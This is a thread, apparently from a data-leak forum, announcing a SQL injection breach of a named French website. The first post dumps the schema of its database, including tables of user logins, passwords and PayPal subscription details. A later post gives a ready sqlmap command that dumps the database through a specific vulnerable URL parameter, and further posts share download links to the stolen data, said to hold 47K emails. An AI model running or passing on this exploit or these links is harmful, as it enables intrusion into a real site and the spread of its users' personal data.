SQL planpaysage-valdancoeur.fr Hacked
by hojatking - May 09, 2021 at 06:40 PM
#1
Wink 
Bug : SQL Injection

Paypal account

PoC:

Quote:Database: planpayscxvaldan
Table: files
[8 columns]
------------------------------------
| Column      | Type                  |
------------------------------------
| size        | bigint20 unsigned  |
| timestamp  | int11 unsigned      |
| description | tinytext              |
| group_id    | mediumint8 unsigned |
| id          | mediumint8 unsigned |
| name        | varchar128          |
| sort_id    | mediumint8 unsigned |
| userid      | mediumint8 unsigned |
------------------------------------

Database: planpayscxvaldan
Table: commandes_articles
[10 columns]
---------------------------------
| Column          | Type          |
---------------------------------
| option          | int11      |
| categorie        | varchar255  |
| id              | int11      |
| id_commande      | int11      |
| id_produit      | int11      |
| img_produit      | varchar25  |
| prix_article    | decimal11,2 |
| prix_tot_article | decimal11,2 |
| produit          | varchar255  |
| qte              | int11      |
---------------------------------

Database: planpayscxvaldan
Table: couleur
[4 columns]
--------------------------
| Column    | Type        |
--------------------------
| couleur_en | varchar255 |
| couleur_fr | varchar255 |
| id        | int11      |
| prix      | decimal6,0 |
--------------------------

Database: planpayscxvaldan
Table: soussouscategorie
[5 columns]
-----------------------------
| Column        | Type        |
-----------------------------
| id            | int11      |
| nom          | varchar50  |
| nom_en        | varchar255 |
| nom_fr        | varchar255 |
| souscategorie | int11      |
-----------------------------

Database: planpayscxvaldan
Table: portfolios_pages
[7 columns]
----------------------------------
| Column    | Type                  |
----------------------------------
| timestamp | timestamp            |
| group_id  | mediumint8 unsigned |
| id        | mediumint8 unsigned |
| name      | varchar128          |
| sort_id  | mediumint8 unsigned |
| status    | tinyint1 unsigned  |
| text      | longtext              |
----------------------------------

Database: planpayscxvaldan
Table: newsletters
[8 columns]
------------------------------------
| Column      | Type                  |
------------------------------------
| timestamp  | timestamp            |
| description | tinytext              |
| group_id    | mediumint8 unsigned |
| id          | mediumint8 unsigned |
| name        | varchar128          |
| send_date  | datetime              |
| status      | tinyint1 unsigned  |
| template_id | smallint5 unsigned  |
------------------------------------

Database: planpayscxvaldan
Table: position_home
[2 columns]
---------------------
| Column    | Type    |
---------------------
| id        | int11 |
| id_produit | int11 |
---------------------

Database: planpayscxvaldan
Table: annoncecomment2
[6 columns]
------------------------------
| Column            | Type    |
------------------------------
| datecomment        | datetime |
| descriptioncomment | text    |
| id                | int11  |
| id_utilisateur    | int11  |
| idcomment          | int11  |
| statutcomment      | int1  |
------------------------------

Database: planpayscxvaldan
Table: portfolios_images
[5 columns]
--------------------------------------
| Column        | Type                  |
--------------------------------------
| timestamp    | timestamp            |
| id            | mediumint8 unsigned |
| name          | varchar128          |
| portfolios_id | mediumint8 unsigned |
| sort_id      | mediumint8 unsigned |
--------------------------------------

Database: planpayscxvaldan
Table: commandes
[15 columns]
----------------------------------------------------------------------------------------------
| Column          | Type                                                                      |
----------------------------------------------------------------------------------------------
| a_timestamp      | datetime                                                                  |
| adresselivraison | varchar200                                                              |
| client_info      | enum'pro','particulier'                                                  |
| commentaires    | varchar255                                                              |
| frais_port      | decimal11,2                                                              |
| id              | int11                                                                    |
| id_utilisateur  | varchar11                                                                |
| ip              | int11                                                                    |
| montant          | decimal11,2                                                              |
| montant_avecport | decimal11,2                                                              |
| nom_utilisateur  | varchar255                                                              |
| num_colis        | varchar50                                                                |
| o_timestamp      | datetime                                                                  |
| statut          | enum'paye','en attente de paiement','envoye','annule','rejetee','valide' |
| statut_details  | enum'carte','cheque','especes','virement','inconnu'                      |
----------------------------------------------------------------------------------------------

Database: planpayscxvaldan
Table: paragraphes
[5 columns]
-------------------------
| Column    | Type        |
-------------------------
| id        | int11      |
| image    | varchar250 |
| soustitre | text        |
| texte    | text        |
| titre    | varchar250 |
-------------------------

Database: planpayscxvaldan
Table: position_sscat
[3 columns]
----------------------
| Column      | Type    |
----------------------
| id_position | int11 |
| id_scat    | int11 |
| id_sscat    | int11 |
----------------------

Database: planpayscxvaldan
Table: paypal_subscription_info
[22 columns]
---------------------------------------
| Column                  | Type        |
---------------------------------------
| amount1                | varchar255 |
| amount2                | varchar255 |
| amount3                | varchar255 |
| datecreation            | date        |
| mc_amount1              | varchar255 |
| mc_amount2              | varchar255 |
| mc_amount3              | varchar255 |
| password                | varchar255 |
| payment_txn_id          | varchar50  |
| period1                | varchar255 |
| period2                | varchar255 |
| period3                | varchar255 |
| reattempt              | varchar255 |
| recur_times            | varchar255 |
| recurring              | varchar255 |
| retry_at                | varchar255 |
| sub_event              | varchar50  |
| subscr_date            | varchar255 |
| subscr_effective        | varchar255 |
| subscr_id              | varchar255 |
| subscriber_emailaddress | varchar255 |
| username                | varchar255 |
---------------------------------------

Database: planpayscxvaldan
Table: logs
[5 columns]
----------------------------------
| Column    | Type                  |
----------------------------------
| timestamp | timestamp            |
| host      | varchar128          |
| id        | mediumint8 unsigned |
| ip        | varchar15          |
| userid    | mediumint8 unsigned |
----------------------------------

Database: planpayscxvaldan
Table: seb-users
[26 columns]
-------------------------------------------
| Column            | Type                  |
-------------------------------------------
| timestamp          | timestamp            |
| access_allfiles    | tinyint1 unsigned  |
| access_files      | tinyint1 unsigned  |
| access_galleries  | tinyint1 unsigned  |
| access_newsletters | tinyint1 unsigned  |
| access_playlist    | tinyint1 unsigned  |
| access_portfolios  | tinyint1 unsigned  |
| access_users      | tinyint1 unsigned  |
| company            | varchar128          |
| directory          | varchar11          |
| directory_path    | varchar255          |
| diskspace          | smallint5 unsigned  |
| email              | varchar128          |
| group_id          | mediumint8 unsigned |
| host              | varchar128          |
| id                | mediumint8 unsigned |
| ip                | varchar15          |
| lang              | enum'fr','en'      |
| lastlogin          | datetime              |
| login              | varchar16          |
| name              | varchar128          |
| notify            | enum'YES','NO'      |
| password          | varchar13          |
| rights            | tinyint2 unsigned  |
| signupdate        | datetime              |
| status            | tinyint1 unsigned  |
-------------------------------------------

Database: planpayscxvaldan
Table: images_produits
[2 columns]
-----------------
| Column | Type    |
-----------------
| id_img | int11 |
| id_pdt | int11 |
-----------------

Database: planpayscxvaldan
Table: playlist
[8 columns]
------------------------------------
| Column      | Type                  |
------------------------------------
| timestamp  | datetime              |
| code_video  | varchar128          |
| description | tinytext              |
| group_id    | mediumint8 unsigned |
| id          | mediumint8 unsigned |
| name        | varchar128          |
| sort_id    | mediumint8 unsigned |
| status      | tinyint1 unsigned  |
------------------------------------

Database: planpayscxvaldan
Table: annoncephase3
[12 columns]
----------------------------------
| Column            | Type        |
----------------------------------
| aime              | varchar20  |
| anonyme            | int1      |
| choixqualification | varchar200 |
| description        | text        |
| id                | int11      |
| id_utilisateur    | int11      |
| idprojet          | int11      |
| ladate            | datetime    |
| lat                | float        |
| lng                | float        |
| statut            | int1      |
| titre              | varchar240 |
----------------------------------

Database: planpayscxvaldan
Table: USERS
[6 columns]
------------------------
| Column    | Type        |
------------------------
| highscore | int11    |
| lastscore | int11    |
| name      | varchar50 |
| password  | text        |
| plays    | int11    |
| username  | varchar20 |
------------------------

Database: planpayscxvaldan
Table: contribuez
[7 columns]
--------------------------------
| Column          | Type        |
--------------------------------
| commentaire      | mediumtext  |
| datecontribut    | datetime    |
| id              | int20      |
| idmap            | int20      |
| nomcontribuateur | varchar100 |
| positionX        | varchar6  |
| positionY        | varchar6  |
--------------------------------

Database: planpayscxvaldan
Table: pdt_options
[3 columns]
--------------------
| Column    | Type    |
--------------------
| id        | int11 |
| id_option | int11 |
| id_pdt    | int11 |
--------------------

Database: planpayscxvaldan
Table: laphrase
[3 columns]
-------------------------------
| Column        | Type          |
-------------------------------
| id            | int1        |
| laphrase      | varchar1000  |
| lesrevendeurs | varchar30000 |
-------------------------------

Database: planpayscxvaldan
Table: newsletters_datas
[8 columns]
--------------------------------------
| Column        | Type                  |
--------------------------------------
| timestamp    | timestamp            |
| id            | mediumint8 unsigned |
| image        | varchar255          |
| intro        | tinytext              |
| newsletter_id | mediumint8 unsigned |
| sort_id      | mediumint8 unsigned |
| text          | text                  |
| title        | varchar255          |
--------------------------------------

Database: planpayscxvaldan
Table: annoncequalifphase2
[6 columns]
-------------------------
| Column    | Type        |
-------------------------
| couleur  | varchar20  |
| icone    | varchar200 |
| id        | int11      |
| image    | varchar250 |
| placement | int11      |
| titre    | varchar250 |
-------------------------

Database: planpayscxvaldan
Table: annonce
[12 columns]
----------------------------------
| Column            | Type        |
----------------------------------
| aime              | varchar20  |
| anonyme            | int1      |
| choixqualification | varchar200 |
| description        | text        |
| id                | int11      |
| id_utilisateur    | int11      |
| idprojet          | int11      |
| ladate            | datetime    |
| lat                | float        |
| lng                | float        |
| statut            | int1      |
| titre              | varchar240 |
----------------------------------

Database: planpayscxvaldan
Table: pm
[9 columns]
-------------------------
| Column    | Type        |
-------------------------
| timestamp | int10      |
| id        | bigint20  |
| id2      | int11      |
| message  | text        |
| title    | varchar256 |
| user1    | bigint20  |
| user1read | varchar3  |
| user2    | bigint20  |
| user2read | varchar3  |
-------------------------

Database: planpayscxvaldan
Table: position_scat
[3 columns]
----------------------
| Column      | Type    |
----------------------
| id_cat      | int11 |
| id_position | int11 |
| id_scat    | int11 |
----------------------

Database: planpayscxvaldan
Table: galleries
[8 columns]
------------------------------------
| Column      | Type                  |
------------------------------------
| timestamp  | int11 unsigned      |
| code_video  | varchar20          |
| description | tinytext              |
| group_id    | mediumint8 unsigned |
| id          | mediumint8 unsigned |
| name        | varchar128          |
| status      | tinyint1 unsigned  |
| user_id    | mediumint8          |
------------------------------------

Database: planpayscxvaldan
Table: utilisateurs
[18 columns]
------------------------------------------------
| Column              | Type                      |
------------------------------------------------
| zone                | varchar50              |
| adresse            | varchar255              |
| codepostal          | varchar11              |
| connaissance        | varchar50              |
| connaissance_detail | varchar50              |
| email              | varchar35              |
| id_utilisateur      | int11                  |
| mot_passe          | varchar50              |
| nom_utilisateur    | varchar25              |
| pays                | varchar250              |
| prenom              | varchar25              |
| rue                | varchar500              |
| statut              | enum'particulier','pro' |
| structure          | varchar200              |
| telephone          | varchar200              |
| telmobile          | varchar20              |
| validation          | int1                    |
| ville              | varchar250              |
------------------------------------------------

Database: planpayscxvaldan
Table: users
[6 columns]
---------------------------
| Column      | Type        |
---------------------------
| avatar      | text        |
| email      | varchar255 |
| id          | bigint20  |
| password    | varchar255 |
| signup_date | int10      |
| username    | varchar255 |
---------------------------

Database: planpayscxvaldan
Table: sessions
[3 columns]
---------------------
| Column | Type        |
---------------------
| data  | text        |
| expire | int11    |
| id    | varchar32 |
---------------------

Database: planpayscxvaldan
Table: portfolios
[8 columns]
------------------------------------
| Column      | Type                  |
------------------------------------
| timestamp  | datetime              |
| description | tinytext              |
| group_id    | mediumint8 unsigned |
| id          | mediumint8 unsigned |
| menu_image  | varchar128          |
| name        | varchar128          |
| sort_id    | mediumint8 unsigned |
| status      | tinyint1 unsigned  |
------------------------------------

Database: planpayscxvaldan
Table: souscategorie
[6 columns]
-------------------------
| Column    | Type        |
-------------------------
| categorie | int11      |
| icone    | varchar200 |
| id        | int11      |
| nom      | varchar50  |
| nom_en    | varchar255 |
| nom_fr    | varchar255 |
-------------------------
Reply
#2
Is this an actual database?
Reply
#3
(May 10, 2021 at 05:44 AM)Burpingjimmy_Bot Wrote: Is this an actual database?

Yes bro

exploit:

sqlmap.py -u "https://www.planpaysage-valdancoeur.fr/cartes/carte.php?idprojet=2705" --random-agent --dbs --batch --tamper=space2mysqldash -D planpayscxvaldan --tables --columns --dump
Reply
#4
(May 10, 2021 at 07:38 AM)hojatking Wrote:
(May 10, 2021 at 05:44 AM)Burpingjimmy_Bot Wrote: Is this an actual database?



Yes bro



exploit:



sqlmap.py -u "https://www.planpaysage-valdancoeur.fr/cartes/carte.php?idprojet=2705" --random-agent --dbs --batch --tamper=space2mysqldash -D planpayscxvaldan --tables --columns --dump


So you're posting the exploit to get a db with a link to the db? This is where we post the actual db's not the exploits and links to them.
Reply
#5
(May 10, 2021 at 07:48 AM)Burpingjimmy_Bot Wrote:
(May 10, 2021 at 07:38 AM)hojatking Wrote:
(May 10, 2021 at 05:44 AM)Burpingjimmy_Bot Wrote: Is this an actual database?



Yes bro



exploit:



sqlmap.py -u "https://www.planpaysage-valdancoeur.fr/cartes/carte.php?idprojet=2705" --random-agent --dbs --batch --tamper=space2mysqldash -D planpayscxvaldan --tables --columns --dump


So you're posting the exploit to get a db with a link to the db? This is where we post the actual db's not the exploits and links to them.

Download Link: https://file.io/8eVgGmvnf0OR 
share in your ploader
Reply
#6
The link work but file delete
Reply
#7
(May 10, 2021 at 01:15 PM)actus41 Wrote: The link work but file delete

https://we.tl/t-H8I5wzhAu7

email 47K
Reply
#8
(May 10, 2021 at 01:40 PM)hojatking Wrote:
(May 10, 2021 at 01:15 PM)actus41 Wrote: The link work but file delete

https://we.tl/t-H8I5wzhAu7

email 47K


Thank you
Reply

 Users browsing this thread: 1 Guest(s)